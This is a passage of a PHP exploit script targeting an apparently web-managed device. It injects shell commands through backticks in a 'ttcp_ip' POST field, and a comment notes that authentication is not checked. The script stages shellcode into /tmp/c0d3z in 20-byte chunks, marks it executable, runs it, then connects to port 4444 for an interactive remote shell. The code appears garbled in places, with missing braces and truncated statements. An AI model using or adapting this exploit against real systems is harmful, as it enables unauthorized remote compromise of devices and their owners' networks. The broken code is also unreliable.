// write the payload in 20byte stages
for($i=0; $i<strlen($shellcode); $i+=20) {
echo "\tSending ".$i."/".strlen($shellcode)." bytes... ";
$cmd = "echo -en '";
for($c=$i; $c<$i+20 && $c<strlen($shellcode); $c++) {
$cmd .= "\\0".decoct(ord($shellcode[$c]));
$cmd .= "' >> /tmp/c0d3z";
$cmd = build_packet($host, $port, $vuln, $cmd);
if(!send_packet($host, $port, $cmd)) die("fail\n");
else echo "sent!\n";
// make it usable
echo "\tConfiguring... ";
$config = build_packet($host, $port, $vuln, "chmod a+rwx /tmp/c0d3z");
if(!send_packet($host, $port, $config)) die("fail\n");
else echo "done!\n";
// add in all the HTTP shit
function build_packet($host, $port, $vuln, $payload) {
$exploit = full_urlencode(
"ttcp_ip=-h `".$payload."`&".
$packet =
"POST /".$vuln." HTTP/1.1\r\n".
"Host: ".$host."\r\n".
// this username:password is never checked ;)
"Authorization: Basic ".base64_encode("admin:ThisCanBeAnything")."\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: ".strlen($exploit)."\r\n".
return $packet;
function send_packet($host, $port, $packet) {
$socket = fsockopen($host, $port, $errno, $errstr);
if(!$socket) return false;
if(!fwrite($socket, $packet)) return false;
return true;
echo "Testing connection to target... ";
$socket = fsockopen($host, $port, $errno, $errstr, 30);
if(!$socket) die("fail\n");
else echo "connected!\n";
echo "Sending payload... \n";
build_payload($host, $port, $vuln, $shellcode);
sleep(3); // don't rush him
echo "Executing payload... ";
if(!send_packet($host, $port, build_packet($host, $port, $vuln, "/tmp/c0d3z"))) die("fail\n");
else echo "done!\n";
sleep(3); // don't rush him
echo "Attempting to get a shell... ";
$socket = fsockopen($host, 4444, $errno, $errstr, 30);
if(!$socket) die("fail\n");
else echo "connected!\n";
echo "Opening shell... \n";
while(!feof($socket)) {
$cmd = readline($host."$ ");
if(!empty($cmd)) readline_add_history($cmd);
// there has got to be a better way to detect that we have
// reached the end of the output than this, but whatever
// it's late... i'm tired... and it works...
fwrite($socket, $cmd.";echo xxxEOFxxx\n");
$data = "";
do {
$data .= fread($socket, 1);
} while(strpos($data, "xxxEOFxxx") === false && !feof($socket));
echo str_replace("xxxEOFxxx", "", $data);